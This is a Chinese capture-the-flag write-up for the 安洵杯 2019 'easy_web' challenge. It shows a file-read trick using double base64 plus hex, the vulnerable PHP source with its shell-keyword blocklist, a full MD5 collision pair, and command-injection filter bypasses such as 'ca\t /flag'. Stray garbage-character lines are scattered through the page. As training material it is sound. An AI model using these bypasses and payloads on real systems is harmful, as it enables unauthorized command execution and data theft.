[安洵杯 2019]easy_web

admin

<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233053765-138473612.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
$ w6 ~5 @* ^7 t<p>&nbsp;题目打开如下，?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd=，同时查看源代码</p>
<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211233545495-732796719.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
' N1 `" P% e, c% S$ `% c0 {; E<p>这里有个MD5 is funny，说明这个题目大概率跟MD5有关</p>
<p>然后我抓包了一下，消息头里面没有什么特殊的东西，于是我尝试从url入手</p>
2 K5 U: A( @4 J( w<p>首先把那个进行一次base64位解码</p>
8 x% K- e, N# r0 q* D  S. y<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234007573-1082134416.png" ></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;解码一次以后还是很像base64编码，于是又解码一次</p>
# Y6 m$ U$ ^: g<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211234057439-916556800.png" ></p>
% c" s! e4 T6 d+ @7 u<p>&nbsp;</p>
<p>&nbsp;</p>
. e3 H& J* u5 f* \0 m$ \<p>&nbsp;然后用hex解码一下得到了</p>
" s, @9 h1 o7 ]$ }<div class="cnblogs_Highlighter">
+ l6 e' R5 c# t  F) |<pre class="brush:sql;gutter:true;">555.png
/ W. Y5 q+ a  A6 u* G7 b* e, v" B3 F- b</pre>
</div>
* P7 V, i/ P$ o<p>　　用同样的方法把index.php进行加密</p>
<div class="cnblogs_Highlighter">
% z, @: O0 X$ C0 w4 V# ^<pre class="brush:sql;gutter:true;">TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
, \+ X) q5 z" y: ?6 [</pre>
2 n) l7 X5 q3 z$ j: ^5 s+ H( ?</div>
) V- O9 p. a  q<p>　　然后输入到地址栏</p>
! |- U$ T7 A5 E- \2 p( [% u<p>&nbsp;然后查看源代码，把源代码里面的那一串base64的编码解码</p>
<div class="cnblogs_code">
  f5 r! z8 V; U0 T" }- D<pre>&lt;?<span style="color: rgba(0, 0, 0, 1)">php
</span><span style="color: rgba(0, 128, 128, 1)">error_reporting</span>(<span style="color: rgba(255, 0, 255, 1)">E_ALL</span> || ~ <span style="color: rgba(255, 0, 255, 1)">E_NOTICE</span><span style="color: rgba(0, 0, 0, 1)">);
' M3 ]/ s" W; U7 U</span><span style="color: rgba(0, 128, 128, 1)">header</span>('content-type:text/html;charset=utf-8'<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$cmd</span> = <span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">];
8 m: @5 ?. Q7 l5 `</span><span style="color: rgba(0, 0, 255, 1)">if</span> (!<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img']) || !<span style="color: rgba(0, 0, 255, 1)">isset</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['cmd'<span style="color: rgba(0, 0, 0, 1)">]))
    </span><span style="color: rgba(0, 128, 128, 1)">header</span>('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='<span style="color: rgba(0, 0, 0, 1)">);
</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = hex2bin(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(0, 128, 128, 1)">base64_decode</span>(<span style="color: rgba(128, 0, 128, 1)">$_GET</span>['img'<span style="color: rgba(0, 0, 0, 1)">])));

</span><span style="color: rgba(128, 0, 128, 1)">$file</span> = <span style="color: rgba(0, 128, 128, 1)">preg_replace</span>("/[^a-zA-Z0-9.]+/", "", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">);
6 e. C* C- I1 d) d1 ?" u* v9 F7 M</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/flag/i", <span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> '&lt;img src ="./ctf3.jpeg"&gt;'<span style="color: rgba(0, 0, 0, 1)">;
    </span><span style="color: rgba(0, 0, 255, 1)">die</span>("xixi～ no flag"<span style="color: rgba(0, 0, 0, 1)">);
. ?: f! G: q* O. ]9 \} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(128, 0, 128, 1)">$txt</span> = <span style="color: rgba(0, 128, 128, 1)">base64_encode</span>(<span style="color: rgba(0, 128, 128, 1)">file_get_contents</span>(<span style="color: rgba(128, 0, 128, 1)">$file</span><span style="color: rgba(0, 0, 0, 1)">));
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;img src='data:image/gif;base64," . <span style="color: rgba(128, 0, 128, 1)">$txt</span> . "'&gt;&lt;/img&gt;"<span style="color: rgba(0, 0, 0, 1)">;
6 Q/ e  M9 q1 _# P3 u    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
}
' ~% b* U' a0 G0 [</span><span style="color: rgba(0, 0, 255, 1)">echo</span> <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
</span><span style="color: rgba(0, 0, 255, 1)">if</span> (<span style="color: rgba(0, 128, 128, 1)">preg_match</span>("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|&lt;|&gt;/i", <span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">)) {
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span>("forbid ~"<span style="color: rgba(0, 0, 0, 1)">);
    </span><span style="color: rgba(0, 0, 255, 1)">echo</span> "&lt;br&gt;"<span style="color: rgba(0, 0, 0, 1)">;
} </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
    </span><span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
6 E* _- _2 }" [8 H! R! }4 M    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
# _: q' t* ]+ o! i% s  ?. i        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
+ r% o' R) H4 _1 P1 E$ r    }
: i4 ]/ l4 m3 I" R}
5 ?1 [) b9 N0 ]
" }' o' S% D( ?</span>?&gt;
4 A) W9 [: U  J, b: |' a&lt;html&gt;
&lt;style&gt;<span style="color: rgba(0, 0, 0, 1)">
  body{
   background</span>:url(./bj.png)  no-<span style="color: rgba(0, 0, 0, 1)">repeat center center;
: c/ m0 z, r- e3 M$ B8 a" c2 P   background</span>-size:<span style="color: rgba(0, 0, 0, 1)">cover;
   background</span>-attachment:<span style="color: rgba(0, 0, 0, 1)">fixed;
0 c2 ]4 _' K4 ]0 v   background</span>-color:<span style="color: rgba(0, 128, 0, 1)">#</span><span style="color: rgba(0, 128, 0, 1)">CCCCCC;</span>
<span style="color: rgba(0, 0, 0, 1)">}
</span>&lt;/style&gt;
9 u, c# D9 f7 ^' _" ^5 J&lt;body&gt;
* C. j9 A3 V/ }( P% f7 |&lt;/body&gt;
&lt;/html&gt;</pre>
</div>
+ a% W0 x* r" d+ K<p>结合前面的推断，关键代码就在</p>
<div class="cnblogs_code">
6 o( S; O4 v' x9 [7 I8 z<pre>    <span style="color: rgba(0, 0, 255, 1)">if</span> ((<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a'] !== (<span style="color: rgba(0, 0, 255, 1)">string</span>)<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'] &amp;&amp; <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['a']) === <span style="color: rgba(0, 128, 128, 1)">md5</span>(<span style="color: rgba(128, 0, 128, 1)">$_POST</span>['b'<span style="color: rgba(0, 0, 0, 1)">])) {
        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> `<span style="color: rgba(128, 0, 128, 1)">$cmd</span><span style="color: rgba(0, 0, 0, 1)">`;
    } </span><span style="color: rgba(0, 0, 255, 1)">else</span><span style="color: rgba(0, 0, 0, 1)"> {
9 z) V6 b& q. |  S! P0 U# w. j        </span><span style="color: rgba(0, 0, 255, 1)">echo</span> ("md5 is funny ~"<span style="color: rgba(0, 0, 0, 1)">);
6 ]5 v9 i7 I% K" ^9 L+ G' B. _    }</span></pre>
</div>
  }5 U6 g0 ]4 k: Q" M# n1 W' E. l% t; x  M; s<p>这种MD5是md5强碰撞</p>
<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
</pre>
</div>
" J* K/ Y" m0 O4 U8 X7 m0 f5 p<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
</pre>
8 T7 j4 y- C* x9 {+ k, y) A</div>
' ]; ~0 n! a( X2 d  A5 G8 Y/ H  T<p>　　只需要这样就可以把cmd里面的当成命令来处理。</p>
6 `, s# t+ m/ y) C" C0 U5 ~. e; _# l/ G<p>于是采用payload:</p>
2 v% h3 t6 H8 ^( R<p><img src="https://img2022.cnblogs.com/blog/2632699/202202/2632699-20220211235254110-1699040750.png" ></p>
0 c+ L; k, A) N<p>&nbsp;</p>
<p>&nbsp;因为'\'并没有被屏蔽所以可以这么绕过</p>
<p>ls和l\s在命令执行的时候结果是一样的。</p>
<p>然后发现根目录里面有/flag</p>
  b: s* f3 ~3 ?  T9 N  }% ~: d2 m<p>于是payload:</p>
+ Y- N7 H& Q/ _$ U$ @& a, A8 o<div class="cnblogs_Highlighter">
<pre class="brush:sql;gutter:true;">?cmd=ca\t%20/flag
/ Q; V9 A$ ?; r; s</pre>
5 i. n+ L: o# p$ Z: o1 a</div>
# y$ B1 S, i: P# a1 S- H<p>　　对于这个题目，因为他没有屏蔽sort和dir</p>
7 E4 Z1 |4 t- }' ~, m<p>所以查看也可以用dir来代替ls，cat可以用sort来代替。</p>
0 L% a, u3 t1 j7 k6 n, o8 ?<p>&nbsp;</p>
1 O' u3 {; [1 Z/ F